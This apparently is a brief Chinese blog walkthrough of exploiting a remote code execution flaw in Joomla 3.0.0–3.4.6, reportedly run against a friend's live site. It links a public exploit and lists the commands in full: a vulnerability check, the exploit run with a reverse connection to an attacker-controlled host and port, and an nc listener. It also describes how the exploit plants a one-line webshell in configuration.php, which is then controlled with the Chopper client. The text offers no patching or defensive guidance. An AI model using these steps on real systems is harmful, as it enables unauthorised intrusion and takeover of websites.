Joomla 3.0.0 --> 3.4.6-RCE复现
Joomla是一款网站管理系统CMS,最近曝出其3.00-3.4.6的joomla版本存在一个RCE漏洞。
并且大佬已将exp放在了github上,下载地址:https://www.exploit-db.com/exploits/47465
该exp是用python3写的
环境的话,可以自己在服务器或者本机上搭建一个joomla对应的版本,网上很多教程。
我这里直接使用一个朋友的站来做实验,我们先用这个python文件验证是否存在该漏洞:
python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/
像这样最后显示use --exploit to exploit it 就说明此站点存在这个rce漏洞
然后利用exp的命令:
python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/ --exploit --lhost 192.168.1.120 --lport 9000 //用于监听的公网ip和一个不占用的端口
然后用公网的vps通过nc来监听9000端口:
nc -lvvp 9000
之后再运行exp的命令,将自动写入一句话木马到根目录下面的configuration.php文件里面:
出现如上图所示的字符串即是一句话木马的随机密码。
然后菜刀连接
最后成功getshell。